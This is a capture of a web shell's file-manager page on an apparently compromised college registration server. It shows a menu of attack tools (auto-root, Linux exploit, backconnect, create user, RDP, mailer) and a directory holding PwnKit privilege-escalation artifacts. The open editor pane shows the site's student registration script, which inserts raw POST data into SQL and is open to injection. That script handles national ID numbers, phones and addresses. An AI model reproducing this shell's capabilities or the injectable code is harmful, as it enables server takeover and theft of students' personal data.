Linux srv1.sbit.com.bd 5.14.0-503.21.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jan 12 09:45:05 EST 2025 x86_64
Apache
: 192.99.39.68 | : 216.73.216.165
Cant Read [ /etc/named.conf ]
8.2.29
gzmcfenigov
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gzmcfenigov /
public_html /
data /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxrwxrwx
adminloginpanel
[ DIR ]
drwxrwxrwx
admission
[ DIR ]
drwxrwxrwx
cgi-bin
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
db_connect
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
studentsportal
[ DIR ]
drwxrwxrwx
.htaccess
489
B
-rw-rw-rw-
.mad-root
0
B
-rw-r--r--
SHOWAllResult.php
19.52
KB
-rw-rw-rw-
check_compolsary_subject.php
893
B
-rw-rw-rw-
check_grou_name.php
768
B
-rw-rw-rw-
check_optional_subject.php
863
B
-rw-rw-rw-
check_selective_subject.php
878
B
-rw-rw-rw-
index.php
48
B
-rw-rw-rw-
jquery-1.11.3.min.js
91.36
KB
-rw-rw-rw-
logo.png
70.27
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
save_reg_info_1.php
6.82
KB
-rw-rw-rw-
showResult.php
11.59
KB
-rw-rw-rw-
std_info_1.php
36.8
KB
-rw-rw-rw-
stdpic.png
3.48
KB
-rw-rw-rw-
view_students_details.php
12.09
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : save_reg_info_1.php
<?php error_reporting(0); @date_default_timezone_set('Asia/Dhaka'); require_once("db_connect/config.php"); require_once("db_connect/conect.php"); $db = new database(); $Name=$_POST["Name"]; $Name_en=$_POST["Name_en"]; $birth_nid_no=$_POST["birth_nid_no"]; $studentMobile=$_POST["studentMobile"]; //father_info $fathersName=$_POST["fathersName"]; $fathers_name_en=$_POST["fathers_name_en"]; $father_nid_no=$_POST["father_nid_no"]; $father_education=$_POST["father_education"]; $occupation=$_POST["occupation"]; $job_location=$_POST["job_location"]; $father_phone=$_POST["father_phone"]; //mother_info $mothersName=$_POST["mothersName"]; $mothers_name_en=$_POST["mothers_name_en"]; $mothers_nid_no=$_POST["mothers_nid_no"]; $mothers_edcuation=$_POST["mothers_edcuation"]; $mothers_occupation=$_POST["mothers_occupation"]; $mother_work_place=$_POST["mother_work_place"]; $mother_mobile_number=$_POST["mother_mobile_number"]; //guardian_info $guardian_name_bn=$_POST["guardian_name_bn"]; $guardian_name_en=$_POST["guardian_name_en"]; $guardian_nid_no=$_POST["guardian_nid_no"]; $guardian_education=$_POST["guardian_education"]; $guardian_occupation=$_POST["guardian_occupation"]; $guardian_job_location=$_POST["guardian_job_location"]; $guardianMobile=$_POST["guardianMobile"]; //quota $quota = $_POST["quota"]; //present adress $pa_home_name=$_POST["pa_home_name"]; $pa_village=$_POST["pa_village"]; $pa_post_office=$_POST["pa_post_office"]; $pa_upazila=$_POST["pa_upazila"]; $pa_district=$_POST["pa_district"]; //permenant adress $ra_home_name=$_POST["ra_home_name"]; $ra_village=$_POST["ra_village"]; $ra_post_office=$_POST["ra_post_office"]; $ra_upazila=$_POST["ra_upazila"]; $ra_district=$_POST["ra_district"]; $date_of_birth = $_POST["date_of_birth"]; $nationality = $_POST["nationality"]; $religion = $_POST["religion"]; // board_exam_info $board_exam_name = $_POST["board_exam_name"]; $board_exam_passyear = $_POST["board_exam_passyear"]; $board_exam_institute_name = $_POST["board_exam_institute_name"]; $board_exam_reg_no = $_POST["board_exam_reg_no"]; $board_exam_roll_no = $_POST["board_exam_roll_no"]; $board_exam_session = $_POST["board_exam_session"]; $board_exam_pass_gpa = $_POST["board_exam_pass_gpa"]; $trxid = $_POST["trxid"]; $gender = $_POST["gender"]; $relation_with_std=$_POST['relation_with_std']; $previousClass=$_POST['previousClass']; $trxdate=$_POST['trxdate']; $Session=$_POST['Session']; // $roll=$_POST["roll"]; // $regNumber=$_POST["regNumber"]; $className=explode('and', $_POST["className"]); $groupname=explode('and', $_POST["groupname"]); $count_subject=0; $count_selective=0; $optional_subject=0; $count_subject=count($_POST["subject"]); $count_selective=count($_POST["selective"]); $optional_subject=$_POST["optional_subject"]; // $Name=$_POST["Name"]; $daeanddTime=date("d-m-Y h:i:sa"); $reg_phone=$_POST['reg_phone']; $roll=$_POST['stdrollNo']; $fee='0'; // echo $_POST["selective"][0]; if( !empty($className[0]) && !empty($Name_en) && !empty($fathers_name_en) && !empty($mothers_name_en) && !empty($roll) && $count_selective==3) { $prefix='24'; $id=$db->autogenerat('online_reg_std_info','id','24','6'); $sql="INSERT INTO `online_reg_std_info` (`id`,`roll`,`trxid`,`gender`,`reg_phone`,`name`,`name_en`,`birth_nid_no`,`fathers_name`,`fathers_name_en`,`father_nid_no`,`father_education`,`occupation`,`job_location`,`father_phone`,`mothers_name`,`mothers_name_en`,`mothers_nid_no`,`mothers_edcuation`,`mothers_occupation`,`mother_work_place`,`mother_mobile_number`,`std_mobile`,`guardian_name_bn`,`guardian_name_en`,`guardian_nid_no`,`guardian_education`,`guardian_occupation`,`guardian_job_location`,`guardian_mobile`,`quota`,`pa_home_name`,`pa_village`,`pa_post_office`,`pa_upazila`,`pa_district`,`ra_home_name`,`ra_village`,`ra_post_office`,`ra_upazila`,`ra_district`,`date_of_birth`,`nationality`,`religion`,`board_exam_name`,`board_exam_passyear`,`board_exam_institute_name`,`board_exam_reg_no`,`board_exam_roll_no`,`board_exam_session`,`board_exam_pass_gpa`,`class`,`group`,`session`,`date`,`reg`,`relation_with_std`,`previous_class`,`appaly_date`) VALUES('$id','$roll','$trxid','$gender','$reg_phone','$Name','$Name_en','$birth_nid_no','$fathersName','$fathers_name_en','$father_nid_no','$father_education','$occupation','$job_location','$father_phone','$mothersName','$mothers_name_en','$mothers_nid_no','$mothers_edcuation','$mothers_occupation','$mother_work_place','$mother_mobile_number','$studentMobile','$guardian_name_bn','$guardian_name_en','$guardian_nid_no','$guardian_education','$guardian_occupation','$guardian_job_location','$guardianMobile','$quota','$pa_home_name','$pa_village','$pa_post_office','$pa_upazila','$pa_district','$ra_home_name','$ra_village','$ra_post_office','$ra_upazila','$ra_district','$date_of_birth','$nationality','$religion','$board_exam_name','$board_exam_passyear','$board_exam_institute_name','$board_exam_reg_no','$board_exam_roll_no','$board_exam_session','$board_exam_pass_gpa','$className[0]','$groupname[0]','$Session','$daeanddTime','$fee','$relation_with_std','$previousClass','$trxdate')"; if ($db->link->query($sql) === TRUE) { for($a = 0; $a < count($_POST["subject"]);$a++){ $explodecompulsarysubject=explode('codnumber', $_POST['subject'][$a]); $inser_compusaray_Subject="INSERT INTO `online_subject_registration_table` (`std_id`,`class_id`,`group_id`,`subject_id`) VALUES ('$id','".$className[0]."','".$groupname[0]."','".$explodecompulsarysubject[0]."')"; $db->insert_query($inser_compusaray_Subject); } for($n=0; $n <count($_POST["selective"]); $n++ ) { $explopide_selective=explode("codenumber",$_POST['selective'][$n]); $insert_select_subject="INSERT INTO `online_subject_registration_table` (`std_id`,`class_id`,`group_id`,`subject_id`) VALUES ('$id','".$className[0]."','".$groupname[0]."','".$explopide_selective[0]."')"; $db->insert_query($insert_select_subject); } if(!empty($_POST["optional_subject"])) { $insert_optional_Subject="INSERT INTO `online_subject_registration_table` (`std_id`,`class_id`,`group_id`,`subject_id`) VALUES ('$id','".$className[0]."','".$groupname[0]."','".$_POST["optional_subject"]."')"; $db->insert_query($insert_optional_Subject); } $message='Congratulations! Your information have saved successfully. Professor Ahammed Hossain, Principal. Govt. Zia Mohila College.'; $db->sendsms($studentMobile,$message); print $id; } else { print "0"; } } else { print "0"; } ?>
Close